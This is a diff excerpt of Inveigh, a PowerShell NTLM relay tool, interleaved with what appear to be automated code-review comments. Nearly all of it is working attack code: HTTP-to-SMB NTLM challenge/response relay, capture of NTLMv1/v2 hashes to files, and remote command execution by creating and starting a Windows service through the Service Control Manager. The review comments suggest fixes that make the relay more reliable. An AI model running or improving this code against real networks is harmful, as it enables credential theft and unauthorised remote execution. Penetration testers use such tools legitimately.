$SMB_service_manager_context_handle = $SMB_client_receive[108..127]
$packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has required privilege on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has command execution privilege on $Target") > $null
if($Attack -eq 'Session')
{
$SMB_administrator = $true
$SMB_close_service_handle_stage = 2
- $SMB2_message_ID += 19
$SMB_client_stage = 'CloseServiceHandle'
}
elseif($SCM_data.Length -lt $SMB_split_index)
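Review bot: The Session branch drops `$SMB2_message_ID += 19` without a replacement, while the parallel no-privilege branch in the next hunk replaces its `+= 19` with `$SMB2_message_ID++`. Since the CloseServiceHandle stage later in this file only increments when `$SMB_close_service_handle_stage -eq 1` and both branches set the stage to 2, the Session path appears to reuse the MessageId of the previous request for its CloseServiceHandle request, which an SMB2 server would typically reject. Unless an increment I cannot see happens between these stages, add `$SMB2_message_ID++` next to `$SMB_close_service_handle_stage = 2` so the two branches stay in step. The enclosing stage handler starts and ends outside this hunk.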
@@ -2407,24 +2451,24 @@ $SMB_relay_functions_scriptblock =
if($HTTP_NTLM_domain_string -ne '')
{
- $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
}
if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target"))
{
- $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null
}
if($Attack -ne 'Session')
{
$SMB_relay_failed = $true
- $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target")
+ $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target") > $null
}
- $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have required privilege on $Target") > $null
+ $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have command execution privilege on $Target") > $null
$SMB_service_manager_context_handle = $SMB_client_receive[108..127]
$SMB_close_service_handle_stage = 2
- $SMB2_message_ID += 19
+ $SMB2_message_ID++
$SMB_client_stage = 'CloseServiceHandle'
}
else
@@ -2436,8 +2480,8 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
@@ -2457,13 +2501,13 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW_First'
{
$SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $SMB2_message_ID += 20
+ $SMB2_message_ID++
$SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
$packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
$packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
$SMB_split_index_tracker = $SMB_split_index
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2496,7 +2540,7 @@ $SMB_relay_functions_scriptblock =
$packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
$packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2525,7 +2569,7 @@ $SMB_relay_functions_scriptblock =
$SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
$packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2548,8 +2592,8 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service created on $Target") > $null
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute command on $Target") > $null
$SMB_service_context_handle = $SMB_client_receive[112..131]
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
@@ -2569,7 +2613,7 @@ $SMB_relay_functions_scriptblock =
}
elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
{
- $inveigh.console_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null
$SMB_relay_failed = $true
}
else
@@ -2591,8 +2635,8 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service failed to start on $Target") > $null
}
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
@@ -2618,7 +2662,7 @@ $SMB_relay_functions_scriptblock =
if($SMB_close_service_handle_stage -eq 1)
{
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service deleted on $Target") > $null
- $SMB2_message_ID += 20
+ $SMB2_message_ID++
$SMB_close_service_handle_stage++
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
}
@@ -2629,7 +2673,7 @@ $SMB_relay_functions_scriptblock =
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
}
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
@@ -2647,8 +2691,8 @@ $SMB_relay_functions_scriptblock =
'CloseRequest'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2663,8 +2707,8 @@ $SMB_relay_functions_scriptblock =
'TreeDisconnect'
{
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2689,8 +2733,8 @@ $SMB_relay_functions_scriptblock =
'Logoff'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2818,6 +2862,7 @@ $HTTP_scriptblock =
$HTTP_running = $true
$HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
$HTTP_client_close = $true
+ $process_ID_bytes = Get-ProcessIDArray
$relay_step = 0
if($proxy_listener)
@@ -2933,7 +2978,7 @@ $HTTP_scriptblock =
while($HTTP_stream.DataAvailable)
{
- $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) > $null
}
$TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
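Review bot: The byte count returned by `$HTTP_stream.Read(...)` is now discarded with `> $null`, but each iteration reads into the same buffer from offset 0, so if DataAvailable stays true across iterations an earlier chunk is overwritten and the `ToString` conversion on the next line covers the whole buffer regardless of how much was filled. Capturing the count, `$bytes_read = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)`, and converting only `$TCP_request_bytes[0..($bytes_read - 1)]` keeps stale buffer contents out of the parsed request. Whether the buffer is freshly allocated per connection is outside this hunk, so the stale-data concern is inferred from the reuse pattern visible here.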
@@ -2964,13 +3009,13 @@ $HTTP_scriptblock =
if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") > $null
if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") > $null
}
}
@@ -3024,39 +3069,44 @@ $HTTP_scriptblock =
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
- if($attack -eq 'Session')
+ if($inveigh.target_list -gt 1)
{
- $target = $null
- ForEach($target_entry in $inveigh.target_list)
+ if($attack -eq 'Session')
{
+ $target = $null
- if(!$target)
+ ForEach($target_entry in $inveigh.target_list)
{
-
- if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+
+ if(!$target)
{
- $target = $target_entry
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+
+ if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $target = $target_entry
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null
+ }
+
}
}
- }
-
- if(!$target -and $SessionPriority -eq 'Y')
- {
-
- ForEach($target_entry in $inveigh.target_list)
+ if(!$target -and $SessionPriority -eq 'Y')
{
- if(!$target)
+ ForEach($target_entry in $inveigh.target_list)
{
-
- if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+
+ if(!$target)
{
- $target = $target_entry
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+
+ if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $target = $target_entry
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null
+ }
+
}
}
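Review bot: `if($inveigh.target_list -gt 1)` does not test the list length: with an array on the left, a PowerShell comparison operator filters the array, so the condition is true whenever any entry string-compares greater than `1`, which for IP-address strings is essentially always. The `else` branch added at the end of the next hunk (`$target = $inveigh.target_list[0]`) is therefore likely unreachable. The later `Get-Random -Maximum $inveigh.target_list.Count` shows the intended form: `if($inveigh.target_list.Count -gt 1)`. The enclosing request-handling block begins outside this hunk.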
@@ -3064,39 +3114,43 @@ $HTTP_scriptblock =
}
}
-
- }
- else
- {
- $target = $null
-
- ForEach($target_entry in $inveigh.target_list)
+ else
{
+ $target = $null
- if(!$target)
+ ForEach($target_entry in $inveigh.target_list)
{
- if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry"))
+ if(!$target)
{
- $target = $target_entry
+
+ if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry"))
+ {
+ $target = $target_entry
+ }
+
}
}
- }
+ if(!$target)
+ {
+ $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)]
+ }
- if(!$target)
- {
- $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)]
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target") > $null
}
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+ }
+ else
+ {
+ $target = $inveigh.target_list[0]
}
if($inveigh.SMB_relay -and $relay_step -eq 0 -and ($target -and $HTTP_source_IP -ne $target))
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP")
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target") > $null
$SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
$SMB_relay_socket.Client.ReceiveTimeout = 60000
$SMB_relay_socket.Connect($Target,"445")
@@ -3105,13 +3159,13 @@ $HTTP_scriptblock =
if(!$SMB_relay_socket.connected)
{
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") > $null
$relay_step = 0
}
if($relay_step -eq 1)
{
- $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version
+ $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version $process_ID_bytes
if($SMB_relay_bytes.Length -le 3)
{
@@ -3155,9 +3209,9 @@ $HTTP_scriptblock =
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = 'NTLM ' + $NTLM_challenge_base64
$NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
- $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
+ $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") > $null
$relay_step = 2
}
else
@@ -3171,11 +3225,11 @@ $HTTP_scriptblock =
if(!$target)
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target") > $null
}
elseif($HTTP_source_IP -ne $Target)
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target") > $null
}
$NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
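Review bot: The added log line repeats the word relay, `Relay aborted relay due to initiator matching $target`, and its guard on the preceding context line, `elseif($HTTP_source_IP -ne $Target)`, reads as inverted relative to that message. Given the outer condition in the earlier hunk (`$target -and $HTTP_source_IP -ne $target`), this else path should be reached when the initiator equals the target, so `elseif($HTTP_source_IP -eq $Target)` with the message `Relay aborted due to initiator matching $target` appears to be the intent; the enclosing if/else begins outside this hunk, so confirm no other branch handles that case.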
@@ -3194,7 +3248,7 @@ $HTTP_scriptblock =
if($HTTP_NTLM_domain_length -eq 0)
{
- $HTTP_NTLM_domain_string = ''
+ $HTTP_NTLM_domain_string = ""
}
else
{
@@ -3204,13 +3258,13 @@ $HTTP_scriptblock =
$HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
$HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
- if($HTTP_NTLM_user_length -gt 0)
+ if($HTTP_NTLM_user_length -eq 0)
{
- $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+ $HTTP_NTLM_user_string = ""
}
else
{
- $HTTP_NTLM_user_string = ""
+ $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
}
$HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
@@ -3227,21 +3281,21 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
+ $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
{
$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
}
if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
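Review bot: `$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)` on the context line inside this hunk still lacks `> $null`, while the NTLMv2 counterpart in the next hunk adds it; the ArrayList index returned by Add leaks into the scriptblock's output stream, which is exactly what the rest of this commit is cleaning up. The same unsuppressed Add remains on the NTLMv1 and NTLMv2 file-queue lines in the two Inveigh.ps1 HTTP hunks. Suggest `$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) > $null` here and the matching change at those two sites.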
@@ -3261,26 +3315,26 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
+ $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
{
- $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
}
if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
{
- $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full")
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null
}
}
@@ -3306,8 +3360,8 @@ $HTTP_scriptblock =
if(($inveigh.session_list | Where-Object {$_.User -eq $HTTP_username_full -and $_.Target -eq $target -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target")
- $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") > $null
+ $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes
if(!$SMB_relay_failed)
{
@@ -3318,7 +3372,7 @@ $HTTP_scriptblock =
$inveigh.session_table[$inveigh.session_count] = $SMB_session_ID
$inveigh.session_message_ID_table[$inveigh.session_count] = 3
$inveigh.session_lock_table[$inveigh.session_count] = 'open'
- $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID
+ $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes
$session_object = New-Object PSObject
Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString
@@ -3347,12 +3401,12 @@ $HTTP_scriptblock =
Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
$inveigh.session_list += $session_object
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list") > $null
$inveigh.session_count++
}
else
{
- SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID
+ SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes
}
}
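Review bot: The added line misspells the word Session in a runtime message, `Sesion $($inveigh.session_count) added to session list`; because this string also goes to the log file queue, anyone grepping logs for "Session" during review of a test run will miss these entries. Suggest `$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Session $($inveigh.session_count) added to session list") > $null`.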
@@ -3362,7 +3416,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target") > $null
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3370,7 +3424,7 @@ $HTTP_scriptblock =
}
else
{
